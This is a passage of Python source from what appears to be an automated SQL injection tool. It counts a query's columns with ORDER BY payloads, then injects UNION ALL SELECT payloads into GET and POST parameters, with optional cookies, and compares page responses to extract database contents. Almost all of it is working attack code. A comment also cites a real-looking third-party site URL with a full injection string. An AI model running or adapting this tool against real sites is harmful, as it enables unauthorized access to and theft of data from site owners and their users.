db_url = vul_page + par + sp + "order" + sp + "by" + sp + column.__str__() + "--" + plus # Order by Payload
# print "Form mode disabled", db_url # Debugging
try:
if cookies == "":
# print "NO COOKIES" # DEBUGGING
if method == "POST": # POST Method # Checking if the method is POST or GET
# print "METHOD POST" # DEBUGGING
pure_url = vul_page[:vul_page.rfind("?")] # Extracting the original URL
data_list = db_url[db_url.rfind("?")+1:].split("&")
for dl in data_list: # Making a dictionary with data for the post request
d_name.append(dl[:dl.find('=')])
d_value.append(dl[dl.find('=')+1:])
data_dict = dict(zip(d_name, d_value))
del d_name[:] # Empties the old data
del d_value[:]
db_html = requests.post(pure_url, data=data_dict, cookies=cookies_dict).text # POST Request
else:
# print "METHOD GET" # DEBUGGING
db_html = urllib.urlopen(db_url).read()
else:
# print "WITH COOKIES (ERROR BASED)" # DEBUGGING
if method == "POST": # POST Method # Checking if the method is POST or GET
# print "METHOD POST (ERROR BASED)" # DEBUGGING
pure_url = vul_page[:vul_page.rfind("?")] # Extracting the original URL
data_list = db_url[db_url.rfind("?")+1:].split("&")
for dl in data_list: # Making a dictionary with data for the post request
d_name.append(dl[:dl.find('=')])
d_value.append(dl[dl.find('=')+1:])
data_dict = dict(zip(d_name, d_value))
del d_name[:] # Empties the old data
del d_value[:]
db_html = requests.post(pure_url, data=data_dict, cookies=cookies_dict).text # POST Request
else:
db_html = requests.get(db_url, cookies=cookies_dict).text
except:
print ""
print tm(), wrn, "Injected URL is not stable!!!"
print tm(), wrn, "Please make sure you are connected to the internet and try again"
break
if re.search(ord_by_err, db_html) or re.search(ord_by_err_glassfish, db_html) or re.search(ord_by_err2, db_html):
column_num = column - 1 # Setting the number of the columns that have been found
# print "Bbbbbbbbbbbbbbbb", column_num # Debugging
par_break = True
break
proggress = ""
if par_break: break # Breaking the loop when the used number of parentheses found
par += ")" # Increasing the number of parentheses
plus = sp + "-" # Appending the minus at the end (Needed when parentheses are opened)
print ""
if column_num == 0:
print tm(), inf, "Unable to find the number of the columns"
exit()
else:
print tm(), inf, "The target URL appears to have", column_num, "column(s) in query"
# Choose to do Union all technique or exit.
while True:
ch = raw_input("UNION technique seems to be usable. Do you want to continue? [y/N]: ")
if ch == "y" or ch == "Y":
cont_union = True
break
if ch == "N" or ch == "n":
exit()
break
# Choose to search the columns for information or not.
while True:
ch = raw_input("Do you want to search the columns for information? [y/N]: ")
if ch == "y" or ch == "Y":
search_columns = True
break
if ch == "N" or ch == "n":
search_columns = False
break
# Choose to put a limit in the first 10 results or not.
if search_columns:
while True:
ch = raw_input("Do you want to limit the results for each column by 3? [y/N]: ")
if ch == "y" or ch == "Y":
result_limit = True
break
if ch == "N" or ch == "n":
result_limit = False
break
# Finding Database information (UNION BASED)
# NO /*!00000.....*/ BYPASS METHOD!!!
if cont_union:
if form_mode:
if vul_page.count("=") > 1:
temp_vul_page = vul_page[:vul_page.find('$@%#')]
if vul_page[vul_page.find('$@%#')-1] == "'":
vul_page = temp_vul_page[:temp_vul_page.rfind('=')+1:] + "-" + string_check + "'" + vul_page[vul_page.find('$@%#'):]
else:
vul_page = temp_vul_page[:temp_vul_page.rfind('=')+1:] + "-" + string_check + vul_page[vul_page.find('$@%#'):]
else:
vul_page = vul_page[:vul_page.rfind('=')+1] + "-" + vul_page[vul_page.rfind('=')+1:] # Adding - after =
else:
vul_page = vul_page[:vul_page.rfind('=')+1] + "-" + vul_page[vul_page.rfind('=')+1:] # Adding - after =
for clmn_num in range(2, column_num+1): # Create a string with column's number
clmn_list = clmn_list+","+clmn_num.__str__()
# Wrapping for loop with a while loop so we can start over again the for loop for all payloads
proggress = "["+datetime.datetime.now().time().strftime('%H:%M:%S')+"] [ - ] searching..."
print "searching..."
while should_restart:
# sys.stdout.write(proggress+".") # Graphic progress.
should_continue = False
should_restart = False
dbinfo1_found = False
dbinfo2_found = False
dbinfo3_found = False
dbinfo4_found = False
dbinfo5_found = False
dbinfo_exit = False
loop_counter = 0
for clmn_num in range(1, column_num+1): # Looping throw column nums trying to find the vulnerable one
loop_counter += 1 # Increasing until it gets equals to column num
if form_mode:
compare_url = vul_page.replace("$@%#", par + sp + "union" + sp + "all" + sp + "select" + sp+clmn_list+"--" + plus) # First page for comparison
# print "compare url form_mode;", compare_url # Debugging
else:
compare_url = vul_page + par + sp + "union" + sp + "all" + sp + "select" + sp + clmn_list+"--" + plus # First page for comparison
# print "compare url without form_mode:", compare_url # Debugging
try:
if cookies == "":
# print "NO COOKIES" # DEBUGGING
if method == "POST": # POST Method # Checking if the method is POST or GET
# print "METHOD POST" # DEBUGGING
pure_url = vul_page[:vul_page.rfind("?")] # Extracting the original URL
data_list = compare_url[compare_url.rfind("?")+1:].split("&")
for dl in data_list: # Making a dictionary with data for the post request
d_name.append(dl[:dl.find('=')])
d_value.append(dl[dl.find('=')+1:])
data_dict = dict(zip(d_name, d_value))
del d_name[:] # Empties the old data
del d_value[:]
compare_html = requests.post(pure_url, data=data_dict, cookies=cookies_dict).text # POST Request
else:
# print "METHOD GET" # DEBUGGING
compare_html = urllib.urlopen(compare_url).read()
else:
# print "WITH COOKIES (ERROR BASED)" # DEBUGGING
if method == "POST": # POST Method # Checking if the method is POST or GET
# print "METHOD POST (ERROR BASED)" # DEBUGGING
pure_url = vul_page[:vul_page.rfind("?")] # Extracting the original URL
data_list = compare_url[compare_url.rfind("?")+1:].split("&")
for dl in data_list: # Making a dictionary with data for the post request
d_name.append(dl[:dl.find('=')])
d_value.append(dl[dl.find('=')+1:])
data_dict = dict(zip(d_name, d_value))
del d_name[:] # Empties the old data
del d_value[:]
compare_html = requests.post(pure_url, data=data_dict, cookies=cookies_dict).text # POST Request
else:
compare_html = requests.get(compare_url, cookies=cookies_dict).text
except:
print tm(), wrn, "Injected URL is not stable!!!"
print tm(), wrn, "Please make sure you are connected to the internet and try again"
# The comma between the columns is also a benchmark so during the iteration the program can
# separate the number e.g, 1 from 12 or 11 or 21, which also contains the number 1, and
# replaces only the number 1 instead of changing number 11 or 12 or 21
temp_clmn1 = "" # Initiates the variable
temp_clmn1 = ","+clmn_list+"," # Adds a comma in front of the column list
temp_clmn2 = temp_clmn1.replace(","+clmn_num.__str__()+",", ","+db_payload1+",") # New list with payload
temp_clmn2 = temp_clmn2[1:-1] # Removes the comma in front of the list
if form_mode:
union_url = vul_page.replace("$@%#", par+sp+"union"+sp+"all"+sp+"select"+sp+temp_clmn2+db_payload2+"--" + plus) # Second, injected URL (with payload)
print "union url form_mode:", union_url # Debugging
else:
union_url = vul_page + par+sp+"union"+sp+"all"+sp+"select"+sp+temp_clmn2+db_payload2+"--" + plus # Second, injected URL (with payload)
print "union url without Form mode:", union_url # Debugging
try:
if cookies == "":
# print "NO COOKIES" # DEBUGGING
if method == "POST": # POST Method # Checking if the method is POST or GET
# print "METHOD POST" # DEBUGGING
pure_url = vul_page[:vul_page.rfind("?")] # Extracting the original URL
data_list = union_url[union_url.rfind("?")+1:].split("&")
for dl in data_list: # Making a dictionary with data for the post request
d_name.append(dl[:dl.find('=')])
d_value.append(dl[dl.find('=')+1:])
data_dict = dict(zip(d_name, d_value))
del d_name[:] # Empties the old data
del d_value[:]
union_html = requests.post(pure_url, data=data_dict, cookies=cookies_dict).text # POST Request
else:
# print "METHOD GET" # DEBUGGING
union_html = urllib.urlopen(union_url).read()
else:
# print "WITH COOKIES (ERROR BASED)" # DEBUGGING
if method == "POST": # POST Method # Checking if the method is POST or GET
# print "METHOD POST (ERROR BASED)" # DEBUGGING
pure_url = vul_page[:vul_page.rfind("?")] # Extracting the original URL
data_list = union_url[union_url.rfind("?")+1:].split("&")
for dl in data_list: # Making a dictionary with data for the post request
d_name.append(dl[:dl.find('=')])
d_value.append(dl[dl.find('=')+1:])
data_dict = dict(zip(d_name, d_value))
del d_name[:] # Empties the old data
del d_value[:]
union_html = requests.post(pure_url, data=data_dict, cookies=cookies_dict).text # POST Request
else:
union_html = requests.get(union_url, cookies=cookies_dict).text
except:
print tm(), wrn, "Injected URL is not stable!!!"
print tm(), wrn, "Please make sure you are connected to the internet and try again"
if "<body" in compare_html: compare_html_body_list = compare_html.split("<body")
if "<body" in union_html: union_html_body_list = union_html.split("<body")
try: compare_html_body = compare_html_body_list[1]
except: compare_html_body = compare_html
try: union_html_body = union_html_body_list[1]
except: union_html_body = union_html
comp_rem_tags = re.sub('<[/A-Za-z0-9]*>', ' !@#$ ', compare_html_body) # Replacing HTML tags with spaces
union_rem_tags = re.sub('<[/A-Za-z0-9]*>', ' !@#$ ', union_html_body)
compare_split = comp_rem_tags.split(' !@#$ ') # splitting on spaces.
union_split = union_rem_tags.split(' !@#$ ')
compare_set = set(compare_split) # Creating a set with unique attributes
union_set = set(union_split)
compare_removed = union_set - compare_set # Comparing the two set (pages) for differences
union_removed = compare_set - union_set # Needed if the bellow are in use
"""
# Needed when e.g, the results are like "Welcome back John" and not just "John"
# Not needed // TODO: Try putting the next two lines in lines
# union_split_str = ' '.join(union_split)
# union_split_str = re.sub('\s+', ' ', union_split_str)
# union_split_spaces = union_split_str.split(' ')
# Needed when, see example: http://www.cochraneventilation.com/
# articledetails.php?id=-9+union+all+select+1,concat%28id,0x40232340,
# table_id,0x40232340,c1,0x40232340,c2,0x40232340,
# colspan%29,3,4,5,6,7,8+from+cms_rows+limit+0,1--
toremove = ""
for cr in compare_removed:
cr2 = cr.__str__()
if " " in cr2:
toremove = cr
try:
compare_removed.remove(toremove)
except:
pass
"""
compare_string = "" # Creating vars to store set as string
union_string = ""
comm_word = ""
for se in compare_removed: compare_string = se # Creating string with set
for se in union_removed: union_string = se
compare_split_2 = compare_string.split(' ') # splitting on spaces.
union_split_2 = union_string.split(' ')
compare_set_2 = set(compare_split_2) # Creating a set with unique attributes
union_set_2 = set(union_split_2)
common_words = union_set_2 & compare_set_2 # Creating one set with common attributes
for se in common_words: comm_word += " " + se # Making the set string
comm_word = comm_word.strip()
skata = re.sub(comm_word, "", compare_string.strip()).strip() # Removing the unnecessary words
# compare_removed.update([skata]) # Adding the new word to the set || Not needed
# Debugging
# print "union_split", union_split
# print "compare_removed", compare_removed
# print "comm_word", comm_word
# print "skata", skata
for word in union_split: # Spotting the differences
# word = word.strip()
if skata == "": skata = "empty!!!"
# if "<" in skata or ">" in skata: skata = "empty!!!"
# if "<" in word or ">" in word: word = "empty2!!!"
# print bcolors.OKGREEN + "Debug:", skata # Debugging 1
# print bcolors.OKBLUE + "Debug:", word.strip() # Debugging 2
tbl_out1 = 0
clmn_out1 = 0
clinfo_out1 = 0
# Warning: If the first payload does not run, then the other ones will never run!!!!!!!!!!
if skata in word or fake_diff:
# print "YEEEEEEEEEEEEEEEAAAAAAAAAAAAAA!!!!!!!!!!!!!!!" # Debugging (if skata and word is the same, then YEA! is printed)
word = skata
if not fake_diff: # If a difference has been found
if "<" in word or ">" in word: # Checking if the difference is useful or not
should_continue = True # If the difference is not useful, keep searching
if should_continue: # If the difference is not useful, keep searching
continue
print bcolors.HEADER + "Debug:", word.strip() # Debugging 3